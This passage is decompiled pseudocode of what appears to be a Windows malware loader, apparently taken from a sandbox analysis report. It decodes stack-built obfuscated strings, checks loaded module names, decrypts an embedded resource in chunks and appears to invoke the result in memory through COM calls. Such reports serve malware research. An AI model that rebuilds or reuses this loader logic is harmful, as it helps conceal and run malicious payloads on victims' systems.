                                                          				void* _t421;
                                                          				int _t422;
                                                          				int _t424;
                                                          				intOrPtr* _t428;
                                                          				intOrPtr _t429;
                                                          				intOrPtr* _t431;
                                                          				int _t432;
                                                          				int _t435;
                                                          				intOrPtr* _t437;
                                                          				int _t438;
                                                          				intOrPtr* _t439;
                                                          				int _t440;
                                                          				int _t442;
                                                          				signed int _t448;
                                                          				signed int _t451;
                                                          				signed int _t452;
                                                          				int _t469;
                                                          				int _t471;
                                                          				int _t482;
                                                          				signed int _t486;
                                                          				intOrPtr* _t488;
                                                          				intOrPtr* _t490;
                                                          				intOrPtr* _t492;
                                                          				intOrPtr _t493;
                                                          				void* _t494;
                                                          				struct HRSRC__* _t497;
                                                          				void* _t514;
                                                          				int _t519;
                                                          				intOrPtr* _t520;
                                                          				void* _t524;
                                                          				void* _t525;
                                                          				struct HINSTANCE__* _t526;
                                                          				intOrPtr _t527;
                                                          				void* _t531;
                                                          				void* _t535;
                                                          				struct HRSRC__* _t536;
                                                          				intOrPtr* _t537;
                                                          				intOrPtr* _t539;
                                                          				int _t542;
                                                          				int _t543;
                                                          				intOrPtr* _t547;
                                                          				intOrPtr* _t548;
                                                          				intOrPtr* _t549;
                                                          				intOrPtr* _t550;
                                                          				void* _t551;
                                                          				intOrPtr _t552;
                                                          				int _t555;
                                                          				void* _t556;
                                                          				void* _t557;
                                                          				void* _t558;
                                                          				void* _t559;
                                                          				void* _t560;
                                                          				void* _t561;
                                                          				void* _t562;
                                                          				intOrPtr* _t563;
                                                          				void* _t564;
                                                          				void* _t565;
                                                          				void* _t566;
                                                          				void* _t567;
                                                          
                                                          				_t567 = __eflags;
                                                          				_t494 = __edx;
                                                          				__imp__OleInitialize(0); // executed
                                                          				 *((char*)(_t556 + 0x18)) = 0xe0;
                                                          				 *((char*)(_t556 + 0x19)) = 0x3b;
                                                          				 *((char*)(_t556 + 0x1a)) = 0x8d;
                                                          				 *((char*)(_t556 + 0x1b)) = 0x2a;
                                                          				 *((char*)(_t556 + 0x1c)) = 0xa2;
                                                          				 *((char*)(_t556 + 0x1d)) = 0x2a;
                                                          				 *((char*)(_t556 + 0x1e)) = 0x2a;
                                                          				 *((char*)(_t556 + 0x1f)) = 0x41;
                                                          				 *((char*)(_t556 + 0x20)) = 0xd3;
                                                          				 *((char*)(_t556 + 0x21)) = 0x20;
                                                          				 *((char*)(_t556 + 0x22)) = 0x64;
                                                          				 *((char*)(_t556 + 0x23)) = 6;
                                                          				 *((char*)(_t556 + 0x24)) = 0x8a;
                                                          				 *((char*)(_t556 + 0x25)) = 0xf7;
                                                          				 *((char*)(_t556 + 0x26)) = 0x3d;
                                                          				 *((char*)(_t556 + 0x27)) = 0x9d;
                                                          				 *((char*)(_t556 + 0x28)) = 0xd9;
                                                          				 *((char*)(_t556 + 0x29)) = 0xee;
                                                          				 *((char*)(_t556 + 0x2a)) = 0x15;
                                                          				 *((char*)(_t556 + 0x2b)) = 0x68;
                                                          				 *((char*)(_t556 + 0x2c)) = 0xf4;
                                                          				 *((char*)(_t556 + 0x2d)) = 0x76;
                                                          				 *((char*)(_t556 + 0x2e)) = 0xb9;
                                                          				 *((char*)(_t556 + 0x2f)) = 0x34;
                                                          				 *((char*)(_t556 + 0x30)) = 0xbf;
                                                          				 *((char*)(_t556 + 0x31)) = 0x1e;
                                                          				 *((char*)(_t556 + 0x32)) = 0xe7;
                                                          				 *((char*)(_t556 + 0x33)) = 0x78;
                                                          				 *((char*)(_t556 + 0x34)) = 0x98;
                                                          				 *((char*)(_t556 + 0x35)) = 0xe9;
                                                          				 *((char*)(_t556 + 0x36)) = 0x6f;
                                                          				 *((char*)(_t556 + 0x37)) = 0xb4;
                                                          				 *((char*)(_t556 + 0x38)) = 0;
                                                          				_push(E00401650(_t556 + 0x14, _t556 + 0x114));
                                                          				_t337 = E0040B99E(0, _t494, _t524, _t535, _t567);
                                                          				_t557 = _t556 + 0xc;
                                                          				if(_t337 == 0x41b2a0) {
                                                          					L80:
                                                          					__eflags = 0;
                                                          					return 0;
                                                          				} else {
                                                          					_t340 = CreateToolhelp32Snapshot(8, GetCurrentProcessId()); // executed
                                                          					_t525 = _t340;
                                                          					 *((intOrPtr*)(_t557 + 0x280)) = 0x224;
                                                          					 *((char*)(_t557 + 0x64)) = 0xce;
                                                          					 *((char*)(_t557 + 0x65)) = 0x27;
                                                          					 *((char*)(_t557 + 0x66)) = 0x9c;
                                                          					 *((char*)(_t557 + 0x67)) = 0x1a;
                                                          					 *((char*)(_t557 + 0x68)) = 0x95;
                                                          					 *((char*)(_t557 + 0x69)) = 0x2e;
                                                          					 *((char*)(_t557 + 0x6a)) = 0x22;
                                                          					 *((char*)(_t557 + 0x6b)) = 0x57;
                                                          					 *((char*)(_t557 + 0x6c)) = 0x91;
                                                          					 *((char*)(_t557 + 0x6d)) = 0x21;
                                                          					 *((char*)(_t557 + 0x6e)) = 0x57;
                                                          					 *((char*)(_t557 + 0x6f)) = 0x3a;
                                                          					 *((char*)(_t557 + 0x70)) = 0xf8;
                                                          					 *((char*)(_t557 + 0x71)) = 0x98;
                                                          					 *((char*)(_t557 + 0x72)) = 0x5b;
                                                          					 *((char*)(_t557 + 0x73)) = 0xf4;
                                                          					 *((char*)(_t557 + 0x74)) = 0xb5;
                                                          					 *((char*)(_t557 + 0x75)) = 0x87;
                                                          					 *((char*)(_t557 + 0x76)) = 0x7b;
                                                          					 *((char*)(_t557 + 0x77)) = 0xf;
                                                          					 *((char*)(_t557 + 0x78)) = 0xf4;
                                                          					 *((char*)(_t557 + 0x79)) = 0x76;
                                                          					 *((char*)(_t557 + 0x7a)) = 0xb9;
                                                          					 *((char*)(_t557 + 0x7b)) = 0x34;
                                                          					 *((char*)(_t557 + 0x7c)) = 0xbf;
                                                          					 *((char*)(_t557 + 0x7d)) = 0x1e;
                                                          					 *((char*)(_t557 + 0x7e)) = 0xe7;
                                                          					 *((char*)(_t557 + 0x7f)) = 0x78;
                                                          					 *((char*)(_t557 + 0x80)) = 0x98;
                                                          					 *((char*)(_t557 + 0x81)) = 0xe9;
                                                          					 *((char*)(_t557 + 0x82)) = 0x6f;
                                                          					 *((char*)(_t557 + 0x83)) = 0xb4;
                                                          					 *((char*)(_t557 + 0x84)) = 0;
                                                          					 *((char*)(_t557 + 0x18)) = 0xc0;
                                                          					 *((char*)(_t557 + 0x19)) = 0x38;
                                                          					 *((char*)(_t557 + 0x1a)) = 0x8d;
                                                          					 *((char*)(_t557 + 0x1b)) = 0x1f;
                                                          					 *((char*)(_t557 + 0x1c)) = 0x8e;
                                                          					 *((char*)(_t557 + 0x1d)) = 0x30;
                                                          					 *((char*)(_t557 + 0x1e)) = 0x65;
                                                          					 *((char*)(_t557 + 0x1f)) = 0x47;
                                                          					 *((char*)(_t557 + 0x20)) = 0xd3;
                                                          					 *((char*)(_t557 + 0x21)) = 0x29;
                                                          					 *((char*)(_t557 + 0x22)) = 0x3b;
                                                          					 *((char*)(_t557 + 0x23)) = 0x56;
                                                          					 *((char*)(_t557 + 0x24)) = 0xf8;
                                                          					 *((char*)(_t557 + 0x25)) = 0x98;
                                                          					 *((char*)(_t557 + 0x26)) = 0x5b;
                                                          					 *((char*)(_t557 + 0x27)) = 0xf4;
                                                          					 *((char*)(_t557 + 0x28)) = 0xb5;
                                                          					 *((char*)(_t557 + 0x29)) = 0x87;
                                                          					 *((char*)(_t557 + 0x2a)) = 0x7b;
                                                          					 *((char*)(_t557 + 0x2b)) = 0xf;
                                                          					 *((char*)(_t557 + 0x2c)) = 0xf4;
                                                          					 *((char*)(_t557 + 0x2d)) = 0x76;
                                                          					 *((char*)(_t557 + 0x2e)) = 0xb9;
                                                          					 *((char*)(_t557 + 0x2f)) = 0x34;
                                                          					 *((char*)(_t557 + 0x30)) = 0xbf;
                                                          					 *((char*)(_t557 + 0x31)) = 0x1e;
                                                          					 *((char*)(_t557 + 0x32)) = 0xe7;
                                                          					 *((char*)(_t557 + 0x33)) = 0x78;
                                                          					 *((char*)(_t557 + 0x34)) = 0x98;
                                                          					 *((char*)(_t557 + 0x35)) = 0xe9;
                                                          					 *((char*)(_t557 + 0x36)) = 0x6f;
                                                          					 *((char*)(_t557 + 0x37)) = 0xb4;
                                                          					 *((char*)(_t557 + 0x38)) = 0;
                                                          					_t341 = Module32First(_t525, _t557 + 0x278); // executed
                                                          					if(_t341 == 0) {
                                                          						L38:
                                                          						CloseHandle(_t525);
                                                          						_t526 = GetModuleHandleA(0);
                                                          						 *((char*)(_t557 + 0x1c)) = 0xfc;
                                                          						 *((char*)(_t557 + 0x1d)) = 0xb;
                                                          						 *((char*)(_t557 + 0x1e)) = 0xff;
                                                          						 *((char*)(_t557 + 0x1f)) = 0x75;
                                                          						 *((char*)(_t557 + 0x20)) = 0xe7;
                                                          						 *((char*)(_t557 + 0x21)) = 0x44;
                                                          						 *((char*)(_t557 + 0x22)) = 0x4b;
                                                          						 *((char*)(_t557 + 0x23)) = 0x23;
                                                          						 *((char*)(_t557 + 0x24)) = 0xbf;
                                                          						 *((char*)(_t557 + 0x25)) = 0x45;
                                                          						 *((char*)(_t557 + 0x26)) = 0x3b;
                                                          						 *((char*)(_t557 + 0x27)) = 0x56;
                                                          						 *((char*)(_t557 + 0x28)) = 0xf8;
                                                          						 *((char*)(_t557 + 0x29)) = 0x98;
                                                          						 *((char*)(_t557 + 0x2a)) = 0x5b;
                                                          						 *((char*)(_t557 + 0x2b)) = 0xf4;
                                                          						 *((char*)(_t557 + 0x2c)) = 0xb5;
                                                          						 *((char*)(_t557 + 0x2d)) = 0x87;
                                                          						 *((char*)(_t557 + 0x2e)) = 0x7b;
                                                          						 *((char*)(_t557 + 0x2f)) = 0xf;
                                                          						 *((char*)(_t557 + 0x30)) = 0xf4;
                                                          						 *((char*)(_t557 + 0x31)) = 0x76;
                                                          						 *((char*)(_t557 + 0x32)) = 0xb9;
                                                          						 *((char*)(_t557 + 0x33)) = 0x34;
                                                          						 *((char*)(_t557 + 0x34)) = 0xbf;
                                                          						 *((char*)(_t557 + 0x35)) = 0x1e;
                                                          						 *((char*)(_t557 + 0x36)) = 0xe7;
                                                          						 *((char*)(_t557 + 0x37)) = 0x78;
                                                          						 *((char*)(_t557 + 0x38)) = 0x98;
                                                          						 *((char*)(_t557 + 0x39)) = 0xe9;
                                                          						 *((char*)(_t557 + 0x3a)) = 0x6f;
                                                          						 *((char*)(_t557 + 0x3b)) = 0xb4;
                                                          						 *((char*)(_t557 + 0x3c)) = 0;
                                                          						_t344 = E00401650(_t557 + 0x18, _t557 + 0x158);
                                                          						_t558 = _t557 + 8;
                                                          						_t536 = FindResourceA(_t526, _t344, 0xa);
                                                          						 *(_t558 + 0x50) = _t536;
                                                          						_t551 = LoadResource(_t526, _t536);
                                                          						 *((intOrPtr*)(_t558 + 0x44)) = LockResource(_t551);
                                                          						_t349 = E0040B84D(0, _t557 + 0x18, _t526, SizeofResource(_t526, _t536)); // executed
                                                          						_push(0x40022);
                                                          						_t537 = _t349; // executed
                                                          						_t350 = E0040AF66(0, _t526, __eflags); // executed
                                                          						_t559 = _t558 + 8;
                                                          						 *(_t559 + 0x34) = _t350;
                                                          						__eflags = _t350;
                                                          						if(_t350 == 0) {
                                                          							 *(_t559 + 0x50) = 0;
                                                          						} else {
                                                          							E0040BA30(_t526, _t350, 0, 0x40022);
                                                          							_t486 =  *(_t559 + 0x40);
                                                          							_t559 = _t559 + 0xc;
                                                          							 *(_t559 + 0x50) = _t486;
                                                          						}
                                                          						E00401300( *(_t559 + 0x50));
                                                          						_t497 =  *(_t559 + 0x48);
                                                          						_t352 = SizeofResource(_t526, _t497);
                                                          						 *(_t559 + 0x40) = _t352;
                                                          						asm("cdq");
                                                          						_t354 = _t352 + (_t497 & 0x000003ff) >> 0xa;
                                                          						__eflags = _t354;
                                                          						if(_t354 > 0) {
                                                          							_t519 =  *(_t559 + 0x3c);
                                                          							_t482 = _t537 - _t519;
                                                          							__eflags = _t482;
                                                          							 *(_t559 + 0x34) = _t519;
                                                          							 *(_t559 + 0x88) = _t482;
                                                          							 *(_t559 + 0x38) = _t354;
                                                          							do {
                                                          								_t424 =  *(_t559 + 0x34);
                                                          								_push( *(_t559 + 0x88) + _t424);
                                                          								_push(0x400);
                                                          								_push(_t424);
                                                          								E00401560(0,  *((intOrPtr*)(_t559 + 0x54)));
                                                          								 *(_t559 + 0x34) =  *(_t559 + 0x34) + 0x400;
                                                          								_t179 = _t559 + 0x38;
                                                          								 *_t179 =  *(_t559 + 0x38) - 1;
                                                          								__eflags =  *_t179;
                                                          							} while ( *_t179 != 0);
                                                          						}
                                                          						_t448 =  *(_t559 + 0x40) & 0x800003ff;
                                                          						__eflags = _t448;
                                                          						if(_t448 < 0) {
                                                          							_t448 = (_t448 - 0x00000001 | 0xfffffc00) + 1;
                                                          							__eflags = _t448;
                                                          						}
                                                          						__eflags = _t448;
                                                          						if(_t448 > 0) {
                                                          							_t421 =  *(_t559 + 0x40) - _t448;
                                                          							_push(_t421 + _t537);
                                                          							_push(_t448);
                                                          							_t422 = _t421 +  *((intOrPtr*)(_t559 + 0x44));
                                                          							__eflags = _t422;
                                                          							_push(_t422);
                                                          							E00401560(0,  *((intOrPtr*)(_t559 + 0x58)));
                                                          						}
                                                          						E0040BA30(_t526,  *(_t559 + 0x3c), 0,  *(_t559 + 0x40));
                                                          						_t560 = _t559 + 0xc;
                                                          						FreeResource(_t551);
                                                          						_t552 =  *_t537;
                                                          						 *((intOrPtr*)(_t560 + 0x94)) = _t552;
                                                          						_t358 = E0040B84D(0,  *(_t559 + 0x40), _t526, _t552); // executed
                                                          						_t561 = _t560 + 4;
                                                          						 *((intOrPtr*)(_t561 + 0x40)) = _t358;
                                                          						_t359 = SizeofResource(_t526,  *(_t560 + 0x4c));
                                                          						_t527 =  *((intOrPtr*)(_t561 + 0x38));
                                                          						_t192 = _t537 + 4; // 0x4
                                                          						E0040AC60(_t527, _t561 + 0x98, _t192, _t359);
                                                          						E0040BA30(_t527, _t537, 0,  *((intOrPtr*)(_t561 + 0x50)));
                                                          						_t528 = _t527 + 0xe;
                                                          						 *((char*)(_t561 + 0x34)) = 0xce;
                                                          						 *((char*)(_t561 + 0x35)) = 0x27;
                                                          						 *((char*)(_t561 + 0x36)) = 0x9c;
                                                          						 *((char*)(_t561 + 0x37)) = 0x1a;
                                                          						 *((char*)(_t561 + 0x38)) = 0x95;
                                                          						 *((char*)(_t561 + 0x39)) = 0x21;
                                                          						 *((char*)(_t561 + 0x3a)) = 0x2e;
                                                          						 *((char*)(_t561 + 0x3b)) = 0xd;
                                                          						 *((char*)(_t561 + 0x3c)) = 0xdb;
                                                          						 *((char*)(_t561 + 0x3d)) = 0x29;
                                                          						 *((char*)(_t561 + 0x3e)) = 0x57;
                                                          						 *((char*)(_t561 + 0x3f)) = 0x56;
                                                          						 *((char*)(_t561 + 0x40)) = 0xf8;
                                                          						 *((char*)(_t561 + 0x41)) = 0x98;
                                                          						 *((char*)(_t561 + 0x42)) = 0x5b;
                                                          						 *((char*)(_t561 + 0x43)) = 0xf4;
                                                          						 *((char*)(_t561 + 0x44)) = 0xb5;
                                                          						 *((char*)(_t561 + 0x45)) = 0x87;
                                                          						 *((char*)(_t561 + 0x46)) = 0x7b;
                                                          						 *((char*)(_t561 + 0x47)) = 0xf;
                                                          						 *((char*)(_t561 + 0x48)) = 0xf4;
                                                          						 *((char*)(_t561 + 0x49)) = 0x76;
                                                          						 *((char*)(_t561 + 0x4a)) = 0xb9;
                                                          						 *((char*)(_t561 + 0x4b)) = 0x34;
                                                          						 *((char*)(_t561 + 0x4c)) = 0xbf;
                                                          						 *((char*)(_t561 + 0x4d)) = 0x1e;
                                                          						 *((char*)(_t561 + 0x4e)) = 0xe7;
                                                          						 *((char*)(_t561 + 0x4f)) = 0x78;
                                                          						 *((char*)(_t561 + 0x50)) = 0x98;
                                                          						 *((char*)(_t561 + 0x51)) = 0xe9;
                                                          						 *((char*)(_t561 + 0x52)) = 0x6f;
                                                          						 *((char*)(_t561 + 0x53)) = 0xb4;
                                                          						 *((char*)(_t561 + 0x54)) = 0;
                                                          						_t364 = E00401650(_t561 + 0x30, _t561 + 0x110);
                                                          						_t562 = _t561 + 0x24;
                                                          						_t365 = LoadLibraryA(_t364); // executed
                                                          						_t538 = _t365;
                                                          						 *((char*)(_t562 + 0x10)) = 0xe0;
                                                          						 *((char*)(_t562 + 0x11)) = 0x18;
                                                          						 *((char*)(_t562 + 0x12)) = 0xad;
                                                          						 *((char*)(_t562 + 0x13)) = 0x36;
                                                          						 *((char*)(_t562 + 0x14)) = 0x95;
                                                          						 *((char*)(_t562 + 0x15)) = 0x21;
                                                          						_t451 = _t562 + 0x134;
                                                          						 *((char*)(_t562 + 0x1e)) = 0x2a;
                                                          						 *((char*)(_t562 + 0x1f)) = 0x57;
                                                          						 *((char*)(_t562 + 0x20)) = 0xda;
                                                          						 *((char*)(_t562 + 0x21)) = 0xc;
                                                          						 *((char*)(_t562 + 0x22)) = 0x55;
                                                          						 *((char*)(_t562 + 0x23)) = 0x25;
                                                          						 *((char*)(_t562 + 0x24)) = 0x8c;
                                                          						 *((char*)(_t562 + 0x25)) = 0xf9;
                                                          						 *((char*)(_t562 + 0x26)) = 0x35;
                                                          						 *((char*)(_t562 + 0x27)) = 0x97;
                                                          						 *((char*)(_t562 + 0x28)) = 0xd0;
                                                          						 *((char*)(_t562 + 0x29)) = 0x87;
                                                          						 *((char*)(_t562 + 0x2a)) = 0x7b;
                                                          						 *((char*)(_t562 + 0x2b)) = 0xf;
                                                          						 *((char*)(_t562 + 0x2c)) = 0xf4;
                                                          						 *((char*)(_t562 + 0x2d)) = 0x76;
                                                          						 *((char*)(_t562 + 0x2e)) = 0xb9;
                                                          						 *((char*)(_t562 + 0x2f)) = 0x34;
                                                          						 *((char*)(_t562 + 0x30)) = 0xbf;
                                                          						 *((char*)(_t562 + 0x31)) = 0x1e;
                                                          						 *((char*)(_t562 + 0x32)) = 0xe7;
                                                          						 *((char*)(_t562 + 0x33)) = 0x78;
                                                          						 *((char*)(_t562 + 0x34)) = 0x98;
                                                          						 *((char*)(_t562 + 0x35)) = 0xe9;
                                                          						 *((char*)(_t562 + 0x36)) = 0x6f;
                                                          						 *((char*)(_t562 + 0x37)) = 0xb4;
                                                          						 *((char*)(_t562 + 0x38)) = 0;
                                                          						_t366 = E00401650(_t562 + 0x14, _t451);
                                                          						_t563 = _t562 + 8;
                                                          						_t367 = GetProcAddress(_t365, _t366);
                                                          						__eflags = _t367;
                                                          						_t452 = _t451 & 0xffffff00 | _t367 != 0x00000000;
                                                          						__eflags = _t452;
                                                          						 *(_t563 + 0x47) = _t452 == 0;
                                                          						 *0x423480 = _t367;
                                                          						 *((intOrPtr*)(_t563 + 0x80)) = 0;
                                                          						 *((intOrPtr*)(_t563 + 0x84)) = 0;
                                                          						 *((intOrPtr*)(_t563 + 0x4c)) = 0;
                                                          						 *(_t563 + 0x58) = 0;
                                                          						 *(_t563 + 0x54) = 0;
                                                          						__eflags = _t452;
                                                          						if(_t452 != 0) {
                                                          							_t368 =  *_t367(0x41b230, 0x41b220, _t563 + 0x80); // executed
                                                          							__eflags = _t368;
                                                          							if(_t368 >= 0) {
                                                          								__eflags =  *(_t563 + 0x47);
                                                          								if( *(_t563 + 0x47) == 0) {
                                                          									 *((intOrPtr*)(_t563 + 0x17c)) = _t563 + 0x17c;
                                                          									E004018F0( *((intOrPtr*)(_t563 + 0x38)), _t563 + 0x17c, _t563 + 0x17c,  *((intOrPtr*)(_t563 + 0x38)), 3);
                                                          									_t376 =  *((intOrPtr*)(_t563 + 0x80));
                                                          									_t378 =  *((intOrPtr*)( *((intOrPtr*)( *_t376 + 0xc))))(_t376,  *((intOrPtr*)(_t563 + 0x178)), 0x41b240, _t563 + 0x84); // executed
                                                          									__eflags = _t378;
                                                          									if(_t378 >= 0) {
                                                          										_t381 =  *((intOrPtr*)(_t563 + 0x84));
                                                          										_t383 =  *((intOrPtr*)( *((intOrPtr*)( *_t381 + 0x24))))(_t381, 0x41b210, 0x41b290, _t563 + 0x4c); // executed
                                                          										__eflags = _t383;
                                                          										if(_t383 >= 0) {
                                                          											_t384 =  *((intOrPtr*)(_t563 + 0x4c));
                                                          											_t385 =  *((intOrPtr*)( *((intOrPtr*)( *_t384 + 0x28))))(_t384); // executed
                                                          											__eflags = _t385;
                                                          											if(_t385 >= 0) {
                                                          												 *((intOrPtr*)(_t563 + 0x38)) = 0;
                                                          												E00401870(_t563 + 0x44, _t552, "_._");
                                                          												_t539 = __imp__#8;
                                                          												 *((intOrPtr*)(_t563 + 0x40)) = 0;
                                                          												 *_t539(_t563 + 0x94);
                                                          												E00401870(_t563 + 0x3c, _t552, "___");
                                                          												 *_t539(_t563 + 0xa4);
                                                          												 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t563 + 0x4c)))) + 0x34))))( *((intOrPtr*)(_t563 + 0x50)), E004018D0(_t563 + 0x58)); // executed
                                                          												_t542 =  *(_t563 + 0x58);
                                                          												__eflags = _t542;
                                                          												if(_t542 == 0) {
                                                          													E0040AD90(0x80004003);
                                                          												}
                                                          												_t396 =  *((intOrPtr*)( *((intOrPtr*)( *_t542))))(_t542, 0x41b270, E004018D0(_t563 + 0x54));
                                                          												 *((intOrPtr*)(_t563 + 0x94)) = _t552 + 0xfffffff2;
                                                          												 *((intOrPtr*)(_t563 + 0x98)) = 0;
                                                          												__imp__#15(0x11, 1, _t563 + 0x88); // executed
                                                          												_t543 = _t396;
                                                          												 *((intOrPtr*)(_t563 + 0x50)) = 0;
                                                          												__imp__#23(_t543, _t563 + 0x48);
                                                          												E0040B350(0, _t528, _t543,  *((intOrPtr*)(_t563 + 0x48)), _t528, _t552 + 0xfffffff2);
                                                          												_t564 = _t563 + 0xc;
                                                          												__imp__#24(_t543);
                                                          												_t399 =  *(_t564 + 0x54);
                                                          												__eflags = _t399;
                                                          												if(_t399 == 0) {
                                                          													_t399 = E0040AD90(0x80004003);
                                                          												}
                                                          												 *((intOrPtr*)( *((intOrPtr*)( *_t399 + 0xb4))))(_t399, _t543, E004018D0(_t564 + 0x34)); // executed
                                                          												__eflags = _t543;
                                                          												if(_t543 != 0) {
                                                          													__imp__#16(_t543); // executed
                                                          												}
                                                          												_t402 =  *(_t564 + 0x34);
                                                          												__eflags = _t402;
                                                          												if(_t402 == 0) {
                                                          													_t402 = E0040AD90(0x80004003);
                                                          												}
                                                          												_t469 =  *(_t564 + 0x40);
                                                          												_t555 = _t402;
                                                          												__eflags = _t469;
                                                          												if(_t469 == 0) {
                                                          													_t531 = 0;
                                                          													__eflags = 0;
                                                          												} else {
                                                          													_t531 =  *_t469;
                                                          												}
                                                          												 *((intOrPtr*)( *((intOrPtr*)( *_t402 + 0x44))))(_t555, _t531, E004018D0(_t564 + 0x3c)); // executed
                                                          												__imp__#411(0xc, 0, 0);
                                                          												_t471 =  *(_t564 + 0x3c);
                                                          												__eflags = _t471;
                                                          												if(_t471 == 0) {
                                                          													E0040AD90(0x80004003);
                                                          												}
                                                          												_t405 =  *(_t564 + 0x38);
                                                          												__eflags = _t405;
                                                          												if(_t405 == 0) {
                                                          													_t514 = 0;
                                                          													__eflags = 0;
                                                          												} else {
                                                          													_t514 =  *_t405;
                                                          												}
                                                          												_t563 = _t564 - 0x10;
                                                          												_t407 = _t563;
                                                          												 *_t407 =  *((intOrPtr*)(_t564 + 0x94));
                                                          												 *((intOrPtr*)(_t407 + 4)) =  *((intOrPtr*)(_t563 + 0xb0));
                                                          												 *((intOrPtr*)(_t407 + 8)) =  *((intOrPtr*)(_t563 + 0xb8));
                                                          												_t528 =  *((intOrPtr*)(_t563 + 0xc0));
                                                          												 *((intOrPtr*)(_t407 + 0xc)) =  *((intOrPtr*)(_t563 + 0xc0));
                                                          												 *((intOrPtr*)( *((intOrPtr*)( *_t471 + 0xe4))))(_t471, _t514, 0x118, 0, 0, _t564 + 0xa4);
                                                          												_t538 = __imp__#9; // 0x74f3cf00
                                                          												_t538->i(_t563 + 0xa4);
                                                          												E004019A0(_t563 + 0x38);
                                                          												_t538->i(_t563 + 0x94);
                                                          												_t413 =  *(_t563 + 0x3c);
                                                          												__eflags = _t413;
                                                          												if(_t413 != 0) {
                                                          													 *((intOrPtr*)( *((intOrPtr*)( *_t413 + 8))))(_t413);
                                                          												}
                                                          												E004019A0(_t563 + 0x40);
                                                          												_t415 =  *(_t563 + 0x34);
                                                          												__eflags = _t415;
                                                          												if(_t415 != 0) {
                                                          													 *((intOrPtr*)( *((intOrPtr*)( *_t415 + 8))))(_t415);
                                                          												}
                                                          											}
                                                          										}
                                                          									}
                                                          									_t379 =  *((intOrPtr*)(_t563 + 0x174));
                                                          									__eflags = _t379 - _t563 + 0x178;
                                                          									if(__eflags != 0) {
                                                          										_push(_t379);
                                                          										E0040B6B5(0, _t528, _t538, __eflags);
                                                          										_t563 = _t563 + 4;
                                                          									}
                                                          								}
                                                          							}
                                                          							_t369 =  *(_t563 + 0x54);
                                                          							__eflags = _t369;
                                                          							if(_t369 != 0) {
                                                          								 *((intOrPtr*)( *((intOrPtr*)( *_t369 + 8))))(_t369);
                                                          							}
                                                          							_t370 =  *(_t563 + 0x58);
                                                          							__eflags = _t370;
                                                          							if(_t370 != 0) {
                                                          								 *((intOrPtr*)( *((intOrPtr*)( *_t370 + 8))))(_t370);
                                                          							}
                                                          						}
                                                          						goto L80;
                                                          					} else {
                                                          						_t428 = E00401650(_t557 + 0x60, _t557 + 0xd4);
                                                          						_t565 = _t557 + 8;
                                                          						_t547 = _t428;
                                                          						_t520 = _t565 + 0x298;
                                                          						while(1) {
                                                          							_t429 =  *_t520;
                                                          							if(_t429 !=  *_t547) {
                                                          								break;
                                                          							}
                                                          							if(_t429 == 0) {
                                                          								L7:
                                                          								_t429 = 0;
                                                          							} else {
                                                          								_t493 =  *((intOrPtr*)(_t520 + 1));
                                                          								if(_t493 !=  *((intOrPtr*)(_t547 + 1))) {
                                                          									break;
                                                          								} else {
                                                          									_t520 = _t520 + 2;
                                                          									_t547 = _t547 + 2;
                                                          									if(_t493 != 0) {
                                                          										continue;
                                                          									} else {
                                                          										goto L7;
                                                          									}
                                                          								}
                                                          							}
                                                          							L9:
                                                          							if(_t429 != 0) {
                                                          								_t431 = E00401650(_t565 + 0x14, _t565 + 0xb4);
                                                          								_t557 = _t565 + 8;
                                                          								_t548 = _t431;
                                                          								_t488 = _t557 + 0x298;
                                                          								while(1) {
                                                          									_t432 =  *_t488;
                                                          									__eflags = _t432 -  *_t548;
                                                          									if(_t432 !=  *_t548) {
                                                          										break;
                                                          									}
                                                          									__eflags = _t432;
                                                          									if(_t432 == 0) {
                                                          										L16:
                                                          										_t432 = 0;
                                                          									} else {
                                                          										_t432 =  *((intOrPtr*)(_t488 + 1));
                                                          										__eflags = _t432 -  *((intOrPtr*)(_t548 + 1));
                                                          										if(_t432 !=  *((intOrPtr*)(_t548 + 1))) {
                                                          											break;
                                                          										} else {
                                                          											_t488 = _t488 + 2;
                                                          											_t548 = _t548 + 2;
                                                          											__eflags = _t432;
                                                          											if(_t432 != 0) {
                                                          												continue;
                                                          											} else {
                                                          												goto L16;
                                                          											}
                                                          										}
                                                          									}
                                                          									L18:
                                                          									__eflags = _t432;
                                                          									if(_t432 == 0) {
                                                          										goto L10;
                                                          									} else {
                                                          										_t435 = Module32Next(_t525, _t557 + 0x278);
                                                          										__eflags = _t435;
                                                          										if(_t435 != 0) {
                                                          											do {
                                                          												_t437 = E00401650(_t557 + 0x60, _t557 + 0xd4);
                                                          												_t566 = _t557 + 8;
                                                          												_t549 = _t437;
                                                          												_t490 = _t566 + 0x298;
                                                          												while(1) {
                                                          													_t438 =  *_t490;
                                                          													__eflags = _t438 -  *_t549;
                                                          													if(_t438 !=  *_t549) {
                                                          														break;
                                                          													}
                                                          													__eflags = _t438;
                                                          													if(_t438 == 0) {
                                                          														L26:
                                                          														_t438 = 0;
                                                          													} else {
                                                          														_t438 =  *((intOrPtr*)(_t490 + 1));
                                                          														__eflags = _t438 -  *((intOrPtr*)(_t549 + 1));
                                                          														if(_t438 !=  *((intOrPtr*)(_t549 + 1))) {
                                                          															break;
                                                          														} else {
                                                          															_t490 = _t490 + 2;
                                                          															_t549 = _t549 + 2;
                                                          															__eflags = _t438;
                                                          															if(_t438 != 0) {
                                                          																continue;
                                                          															} else {
                                                          																goto L26;
                                                          															}
                                                          														}
                                                          													}
                                                          													L28:
                                                          													__eflags = _t438;
                                                          													if(_t438 == 0) {
                                                          														goto L10;
                                                          													} else {
                                                          														_t439 = E00401650(_t566 + 0x14, _t566 + 0xb4);
                                                          														_t557 = _t566 + 8;
                                                          														_t550 = _t439;
                                                          														_t492 = _t557 + 0x298;
                                                          														while(1) {
                                                          															_t440 =  *_t492;
                                                          															__eflags = _t440 -  *_t550;
                                                          															if(_t440 !=  *_t550) {
                                                          																break;
                                                          															}
                                                          															__eflags = _t440;
                                                          															if(_t440 == 0) {
                                                          																L34:
                                                          																_t440 = 0;
                                                          															} else {
                                                          																_t440 =  *((intOrPtr*)(_t492 + 1));
                                                          																__eflags = _t440 -  *((intOrPtr*)(_t550 + 1));
                                                          																if(_t440 !=  *((intOrPtr*)(_t550 + 1))) {
                                                          																	break;
                                                          																} else {
                                                          																	_t492 = _t492 + 2;
                                                          																	_t550 = _t550 + 2;
                                                          																	__eflags = _t440;
                                                          																	if(_t440 != 0) {
                                                          																		continue;
                                                          																	} else {
                                                          																		goto L34;
                                                          																	}
                                                          																}
                                                          															}
                                                          															L36:
                                                          															__eflags = _t440;
                                                          															if(_t440 == 0) {
                                                          																goto L10;
                                                          															} else {
                                                          																goto L37;
